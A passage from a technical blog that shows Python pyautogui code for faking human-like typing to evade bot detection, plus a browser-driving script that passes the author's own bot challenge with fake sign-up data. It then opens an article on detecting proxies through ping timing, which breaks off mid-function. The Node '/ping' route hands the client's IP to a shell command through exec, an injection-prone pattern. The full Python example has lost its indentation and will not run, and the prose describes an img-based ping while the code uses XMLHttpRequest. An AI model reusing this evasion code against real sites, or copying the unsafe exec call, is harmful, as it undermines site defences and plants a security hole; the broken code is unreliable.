class="mf">10853.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10853.7</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10854.45</span><span class="p">]]</span>
</code></pre></div>
<p>That is a lot of data, but it reveals many interesting things about real human typing behavior.</p>
<p>How would I implement a straightforward human-like typing function?</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pyautogui</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">time</span>

<span class="k">def</span> <span class="nf">tinySleep</span><span class="p">():</span>
    <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.07</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">doubleHit</span><span class="p">(</span><span class="n">key1</span><span class="p">,</span> <span class="n">key2</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Sometimes press two keys down at the same time and randomize the</span>
<span class="sd">    order of the corresponding key up events to resemble</span>
<span class="sd">    human typing more closely.</span>
<span class="sd">    """</span>
    <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>
    <span class="n">tinySleep</span><span class="p">()</span>
    <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
    <span class="n">tinySleep</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
        <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>
        <span class="n">tinySleep</span><span class="p">()</span>
        <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
        <span class="n">tinySleep</span><span class="p">()</span>
        <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">humanTyping</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.015</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">)):</span>
    <span class="sd">"""</span>
<span class="sd">    Mostly the keydown/keyup pairs are in order, but</span>
<span class="sd">    sometimes we want two keydown's at the same time.</span>
<span class="sd">    text: the text to be written in a human fashion.</span>
<span class="sd">    speed: the gap between key presses in seconds. Random number between</span>
<span class="sd">    (low, high)</span>
<span class="sd">    """</span>
    <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">while</span> <span class="n">i</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">):</span>
        <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="o">*</span><span class="n">speed</span><span class="p">))</span>
        <span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o"><</span> <span class="mf">.3</span> <span class="ow">and</span> <span class="n">i</span><span class="o">+</span><span class="mi">1</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">):</span>
            <span class="n">doubleHit</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">])</span>
            <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
            <span class="n">tinySleep</span><span class="p">()</span>
            <span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
            <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span>

<span class="n">humanTyping</span><span class="p">(</span><span class="s2">"this is a test"</span><span class="p">)</span>
</code></pre></div>
<p>The most important observation: Often bots have a perfect sequence of <code>keydown X</code>, <code>keyup X</code>, <code>keydown Y</code>, <code>keyup Y</code> events, whereas humans press keys interleaved: <code>keydown X</code>, <code>keydown Y</code>, <code>keyup Y</code>, <code>keyup X</code>. Only the <code>keydown</code> events must be in order, not the <code>keyup</code> counterparts!</p>
<p>Of course the above algorithm is very bad and easily detectable. A realistic simulation of human typing involves collecting large samples of real typing behavior and then replaying them such that the four temporal delay features resemble those of a real human being.</p>
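<p>To make the interleaving observation concrete, here is a minimal sketch of how recorded events could be reduced to two simple numbers: the mean time a key is held down and the number of key presses that start while another key is still held. The reduced <code>(kind, code, timestamp_ms)</code> tuple layout and the name <code>typing_features</code> are assumptions made for this illustration; they are not the exact recording format shown above.</p>

```python
from statistics import mean


def typing_features(events):
    """Summarize (kind, code, timestamp_ms) tuples, where kind is "kd" or "ku".

    The tuple layout is a simplification assumed for this sketch.
    """
    down_at = {}    # key code -> timestamp of a keydown still waiting for its keyup
    dwell = []      # how long each key was held, in ms
    rollovers = 0   # keydowns that happened while another key was still held
    for kind, code, ts in sorted(events, key=lambda e: e[2]):
        if kind == "kd":
            if code in down_at:
                continue  # duplicate or auto-repeated keydown, ignore it
            if down_at:
                rollovers += 1
            down_at[code] = ts
        elif kind == "ku" and code in down_at:
            dwell.append(ts - down_at.pop(code))
    return {"mean_dwell_ms": mean(dwell) if dwell else 0.0, "rollovers": rollovers}


# A strictly sequential (bot-like) trace and an interleaved (human-like) trace.
bot = [("kd", "KeyA", 0), ("ku", "KeyA", 50), ("kd", "KeyB", 100), ("ku", "KeyB", 150)]
human = [("kd", "KeyA", 0), ("kd", "KeyB", 40), ("ku", "KeyB", 90), ("ku", "KeyA", 110)]
print(typing_features(bot))
print(typing_features(human))
```

<p>A trace with zero rollovers over a long text is a hint, not a proof, that the input was generated by a script.</p>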
<p>There are many biometric features to be found in the temporal aspects of human typing. Some examples:</p>
<ul>
<li>Humans often have to correct spelling mistakes in their texts by using the backspace key or the mouse to select text to be edited. Bots don't do that.</li>
<li>When the same key is pressed twice in a row, such as in <em>coffee</em>, the first <em>f</em> and the first <em>e</em> take longer to type than the second one.</li>
<li>The typing speed within words is faster than between words</li>
<li>There is a cognitive break between sentences, paragraphs, chapters, ...</li>
<li>Complicated words are more frequently re-written than easy words </li>
</ul>
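<p>Some of the features listed above can be sketched as a simple delay model. The function below returns one delay per character: repeated characters are typed faster, there is a short pause after a space and a longer one after sentence-ending punctuation. All numeric ranges and the name <code>keystroke_delays</code> are made up for illustration and are not derived from measured data.</p>

```python
import random

SENTENCE_END = (".", "!", "?")


def keystroke_delays(text, rng=None, base=(0.05, 0.15)):
    """Return one pre-keystroke delay in seconds for each character of text."""
    rng = rng or random.Random()
    delays = []
    prev = None
    for ch in text:
        delay = rng.uniform(*base)
        if prev in SENTENCE_END:
            delay += rng.uniform(0.5, 1.5)   # cognitive break between sentences
        elif prev == " ":
            delay += rng.uniform(0.1, 0.3)   # slower between words than within
        elif ch == prev:
            delay *= 0.6                     # second press of the same key is quicker
        delays.append(delay)
        prev = ch
    return delays


for ch, delay in zip("coffee", keystroke_delays("coffee", random.Random(42))):
    print(repr(ch), round(delay, 3))
```

<p>The delays could be passed to <code>time.sleep()</code> before each key press. Corrections with the backspace key are not modelled here.</p>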
<h2>Full Example Step by Step</h2>
<p>Now we have all parts ready to create a full example. I will show the code for a small example of how to solve the bot challenge that can be found here: <a href="https://bot.incolumitas.com/#botChallenge">https://bot.incolumitas.com/#botChallenge</a>.</p>
<p>The most recent example code can be found <a href="https://github.com/NikolaiT/stealthy-scraping-tools/blob/main/example.py">here</a>.</p>
<p>Run it with:</p>
<div class="highlight"><pre><span></span><code>pipenv shell
</code></pre></div>
<p>And then run:</p>
<div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="n">example</span><span class="o">.</span><span class="n">py</span>
</code></pre></div>
<p>Below is the full Python source code. Please keep in mind that I most likely will
not keep this blog post updated, so consult the GitHub repository instead!</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">from</span> <span class="nn">mouse</span> <span class="kn">import</span> <span class="n">humanMove</span>
<span class="kn">from</span> <span class="nn">typing</span> <span class="kn">import</span> <span class="n">humanTyping</span>
<span class="sd">"""</span>
<span class="sd">You might have to adjust some coordinates. </span>
<span class="sd">I used a dual screen setup and I started the browser on the</span>
<span class="sd">left screen.</span>
<span class="sd">You can obtain the coordinates of your current mouse pointer with </span>
<span class="sd">the bash command on Linux `xdotool getmouselocation`</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">getPageSource</span><span class="p">():</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">'/usr/bin/node page_source.js'</span>
<span class="n">ps</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">return</span> <span class="n">ps</span>
<span class="k">def</span> <span class="nf">getCoords</span><span class="p">(</span><span class="n">selector</span><span class="p">,</span> <span class="n">randomize_within_bcr</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Example: `node coords.js "li:nth-of-type(3) a"`</span>
<span class="sd"> """</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">'/usr/bin/node coords.js "</span><span class="si">{</span><span class="n">selector</span><span class="si">}</span><span class="s1">"'</span>
<span class="n">coords</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">parsed</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">coords</span><span class="p">)</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">[</span><span class="s1">'x'</span><span class="p">]</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">[</span><span class="s1">'y'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">randomize_within_bcr</span><span class="p">:</span>
<span class="n">x</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">parsed</span><span class="p">[</span><span class="s1">'width'</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">parsed</span><span class="p">[</span><span class="s1">'height'</span><span class="p">]))</span>
<span class="k">return</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span>
<span class="k">def</span> <span class="nf">startBrowser</span><span class="p">():</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'google-chrome --remote-debugging-port=9222 --start-maximized --disable-notifications &'</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
<span class="c1"># visit https://bot.incolumitas.com/#botChallenge</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">168</span><span class="p">,</span> <span class="mi">79</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.5</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'bot.incolumitas.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">1.5</span><span class="p">,</span> <span class="mf">2.5</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">startBrowser</span><span class="p">()</span>
<span class="c1"># click link to get to the challenge</span>
<span class="n">coords</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'li:nth-of-type(3) a'</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Clicking on coordinates '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">coords</span><span class="p">))</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">coords</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># enter username</span>
<span class="n">username</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="userName"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">username</span><span class="p">,</span> <span class="n">clicks</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">1.25</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'IamNotABotISwear</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># enter email</span>
<span class="n">email</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="eMail"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">email</span><span class="p">,</span> <span class="n">clicks</span><span class="o">=</span><span class="mi">3</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">1.25</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'bot@spambot.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># agree to the terms</span>
<span class="n">terms</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="terms"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">terms</span><span class="p">)</span>
<span class="c1"># select cats</span>
<span class="n">cat</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'#bigCat'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">cat</span><span class="p">)</span>
<span class="c1"># submit</span>
<span class="n">submit</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'#submit'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">submit</span><span class="p">)</span>
<span class="c1"># press the final enter</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">2.5</span><span class="p">,</span> <span class="mf">3.4</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="c1"># finally get the page source</span>
<span class="n">text</span> <span class="o">=</span> <span class="n">getPageSource</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Got </span><span class="si">{}</span><span class="s1"> bytes of page source'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">)))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>Detecting Datacenter and Residential Proxies2021-04-24T22:07:00+02:002021-05-27T22:07:00+02:00Nikolai Tschachertag:incolumitas.com,2021-04-24:/2021/04/24/detecting-proxies/<p>Detecting proxies can't be that hard, can it?</p><p>In the following blog article, I assume that we are running a web server that hosts a web page and our task is to detect with sufficient accuracy that this site's visitor is using a proxy to hide its <em>true</em> source IP address.</p>
<p>Graphically:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span><span class="n">browser</span><span class="o">/</span><span class="n">client</span><span class="p">]</span><span class="w"> </span><span class="o">---></span><span class="w"> </span><span class="p">[</span><span class="n">http</span><span class="o">/</span><span class="n">socks</span><span class="w"> </span><span class="n">proxy</span><span class="p">]</span><span class="w"> </span><span class="o">---></span><span class="w"> </span><span class="p">[</span><span class="n">target</span><span class="w"> </span><span class="n">website</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>First I need to define what a proxy is: A proxy is any kind of intermediate host to which you can send your network packets in order to camouflage your true source IP address. Proxies are often used for web scraping, because when you request a website too frequently from the same IP address, you will get blocked based on the access count of that IP address. Therefore, switching IP addresses by using several different proxies is a way to evade this kind of block.</p>
<p>For stupid people (such as me), the Internet basically runs on top of two protocols: </p>
<ol>
<li>The IP protocol - this is the protocol that handles packet routing on a hop-by-hop basis</li>
<li>The TCP protocol - TCP assumes that some kind of connection exists. It takes for granted that there is a connection from host A to host B. It then handles things such as reliability, congestion control and transmission loss so that applications can communicate without worrying about such things...</li>
</ol>
<p>Put differently, IP handles all the little annoying details such as: How is my packet properly routed from my laptop's network card to my home modem/router? How does the modem send the network packet to the ISP's infrastructure? How does the ISP route the IP packet to the next host? And so on.</p>
<p>For example, the routing path obtained with <code>tracepath</code> from my home in Germany to my webserver (also in Germany) looks like the following:</p>
<div class="highlight"><pre><span></span><code>$ tracepath incolumitas.com
1?: [LOCALHOST] pmtu 1500
1: _gateway 1.640ms
1: fritz.box 1.241ms
2: 192.0.0.2 1.382ms pmtu 1452
2: 192.0.0.1 6.680ms
3: 62.214.39.53 7.620ms
4: 62.214.37.202 17.278ms asymm 5
5: et-0-0-2.ams3-edge1.digitalocean.com 15.166ms
6: 138.197.244.86 28.158ms
7: 138.197.250.142 22.939ms asymm 6
8: no reply
9: no reply
10: 167.99.241.135 20.330ms reached
Resume: pmtu 1452 hops 10 back 9
</code></pre></div>
<p>However, we cannot take for granted that the above routing information is correct. Path discovery is often done with ICMP and routers can silently drop ICMP packets. Nobody can force any host on the IP packet's path to reply (correctly).</p>
<p>The only thing that we are able to see is the external IP address of the incoming IP packet. We don't know if this is the host that is also the originator (in terms of <em>the process that sent the packet on its way</em>) of the packet or if it is just a proxy.</p>
<p>The <em>real</em> source is the process that creates the socket and sends the TCP/IP packets on their merry way. The <em>real</em> source is the machine that orchestrates and handles the application level logic.</p>
<p>In the remainder of this blog post I will investigate several ideas for revealing that a visitor requested my web site through a proxy.</p>
<h2>First Idea: Cross Ping</h2>
<p>This is not my idea. After visiting <a href="https://whatleaks.com/">whatleaks.com/</a>, I saw that they have a ping test that is capable of detecting whether a proxy/tunnel is used. The idea is straightforward:</p>
<blockquote>
<p>We compare ping from your computer to our server and ping from our server to the host of your external IP. If the difference is too much then there is probably a tunnel and you are using a proxy.</p>
</blockquote>
<p>Put differently, the idea is the following:</p>
<p>If no intermediate proxy server is used, the ping time from the computer (browser) to the server should be roughly the same as from the server to the external IP address. But if there is a proxy server in the middle, then the ping time from the server to the external IP address should be significantly lower than from the computer (browser) to the server, because the browser's traffic has to travel the extra leg to the proxy. We can repeat the pings in order to smooth out statistical outliers.</p>
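<p>The comparison itself could look roughly like the following sketch. It takes several latency samples from each side, compares their medians and flags the visitor if the gap exceeds a threshold. The function name <code>looks_like_tunnel</code> and the 30 ms threshold are assumptions for illustration; a usable threshold would have to be found by experiment.</p>

```python
from statistics import median


def looks_like_tunnel(browser_to_server_ms, server_to_ip_ms, threshold_ms=30.0):
    """Compare repeated latency samples (in ms) from both measurement directions.

    Returns True if the browser side is slower than the server-side ping by more
    than threshold_ms, False if not, and None if one side has no samples.
    """
    if not browser_to_server_ms or not server_to_ip_ms:
        return None  # e.g. the external IP did not answer the ping
    gap = median(browser_to_server_ms) - median(server_to_ip_ms)
    return gap > threshold_ms


# Direct connection: both sides measure about the same latency.
print(looks_like_tunnel([22.1, 20.4, 25.0], [19.8, 21.0, 20.2]))
# Proxy in the middle: the browser side is much slower than the ping to the exit IP.
print(looks_like_tunnel([95.3, 101.7, 98.2], [20.1, 19.7, 22.4]))
```

<p>The median is used instead of the mean so that a single slow sample does not dominate the result.</p>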
<p>That sounds easy, but in reality we will face several issues:</p>
<ol>
<li>Ping uses the ICMP protocol. The ICMP packet is encapsulated in an IPv4 packet. The packet consists of header and data sections. ICMP is a thin protocol that builds on top of the IP protocol. We can easily use the <code>ping</code> command line utility on the server side, but not from the web browser where all we have is JavaScript. It's really not easy to implement something like ping with JavaScript.</li>
<li>When we ping the external IP address (that is assumed to either be the proxy server or the source host), we sometimes don't get an answer. The proxy server can choose to not respond to ICMP packets. However, if it is a proxy server, then a port scan must reveal at least one open TCP/IP port.</li>
</ol>
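<p>For the second issue, a plain TCP connect check is one way to see whether the external IP address has open ports even when it ignores ICMP. The following is only a sketch: the port list is a small illustrative selection and the function name <code>open_tcp_ports</code> is made up. A real proxy can listen on any port, and scanning hosts you do not own may not be permitted.</p>

```python
import socket

# A few ports commonly associated with SOCKS/HTTP proxies (illustrative only).
COMMON_PROXY_PORTS = (1080, 3128, 8080, 8888)


def open_tcp_ports(host, ports=COMMON_PROXY_PORTS, timeout=0.5):
    """Return the subset of ports on host that accept a TCP connection."""
    found = []
    for port in ports:
        try:
            # create_connection performs a full TCP handshake and raises OSError
            # on refusal, unreachable hosts and timeouts.
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass
    return found


if __name__ == "__main__":
    print(open_tcp_ports("127.0.0.1"))
```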
<p>The ping on the server side is easy to implement:</p>
<div class="highlight"><pre><span></span><code><span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/ping'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// ping the external IP address</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">command</span> <span class="o">=</span> <span class="sb">`timeout 0.75 ping -qc1 </span><span class="si">${</span><span class="nx">ip</span><span class="si">}</span><span class="sb"> 2>&1 | awk -F'/' 'END{ print (/^rtt/? "OK "$5" ms":"FAIL") }'`</span><span class="p">;</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">exec</span><span class="p">(</span><span class="nx">command</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span><span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">stdout</span><span class="p">.</span><span class="nx">trim</span><span class="p">(),</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">));</span>
<span class="p">});</span>
</code></pre></div>
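<p>The <code>awk</code> part of the command above splits the summary line of <code>ping</code> on <code>/</code> and prints the fifth field, which is the average RTT. For comparison, here is a rough Python equivalent. It assumes the Linux (iputils) summary format <code>rtt min/avg/max/mdev = ...</code>; the names <code>parse_avg_rtt</code> and <code>ping_once</code> are hypothetical.</p>

```python
import re
import subprocess

# Summary line printed by iputils ping, e.g.
# "rtt min/avg/max/mdev = 19.912/20.330/21.004/0.412 ms"
RTT_LINE = re.compile(r"^rtt min/avg/max/mdev = [\d.]+/([\d.]+)/", re.MULTILINE)


def parse_avg_rtt(ping_output):
    """Return the average RTT in ms from ping's output, or None if there was no reply."""
    match = RTT_LINE.search(ping_output)
    return float(match.group(1)) if match else None


def ping_once(ip, timeout_s=0.75):
    """Send a single ICMP echo request and return the RTT in ms, or None on failure."""
    try:
        # Passing a list avoids handing the IP address to a shell.
        proc = subprocess.run(["ping", "-q", "-c", "1", ip],
                              capture_output=True, text=True, timeout=timeout_s)
    except (subprocess.TimeoutExpired, OSError):
        return None
    return parse_avg_rtt(proc.stdout)


sample = (
    "--- 167.99.241.135 ping statistics ---\n"
    "1 packets transmitted, 1 received, 0% packet loss, time 0ms\n"
    "rtt min/avg/max/mdev = 20.330/20.330/20.330/0.000 ms\n"
)
print(parse_avg_rtt(sample))
```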
<p>The ping on the JavaScript side is of course a bit tougher. We can't send ICMP messages, so we have to make use of what is available.</p>
<p>Of course it's also conceivable to compute the latency through other side channels such as DNS queries, WebSocket messages or even WebRTC.</p>
<p>But in the following solution, we will create an <code><img></code> element with an invalid <code>src</code> attribute and use it to estimate the RTT to the webserver. Please keep in mind that the two numbers are not directly comparable: <code>ping</code> reports the round-trip time of a single ICMP echo, whereas a request issued from JavaScript involves at least a TCP handshake on top of the HTTP exchange and therefore spans more than one RTT.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">ping</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">started</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">().</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">started2</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="cm">/*async*/</span><span class="kc">true</span><span class="p">);</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ended</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">().</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">ended2</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
